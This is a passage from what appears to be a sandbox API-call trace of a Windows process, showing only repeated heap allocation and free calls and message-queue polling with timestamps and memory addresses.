(HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18a0 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18a0 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1850 | out: hHeap=0x8a0000) returned 1 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1850 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1850 | out: hHeap=0x8a0000) returned 1 [0155.504] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.504] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1850 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.504] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18a0 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18a0 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1850 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.505] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.505] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.505] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.505] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.506] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.506] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.506] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.506] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.506] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.507] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.507] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.507] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.507] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.507] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.508] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.508] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.508] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.508] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.508] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.509] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.509] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.509] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.509] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.509] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.510] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.510] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.510] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17f0 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0155.510] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.510] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9ad8 [0155.511] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17f0 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ad8 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17f0 | out: hHeap=0x8a0000) returned 1 [0155.511] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0155.511] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 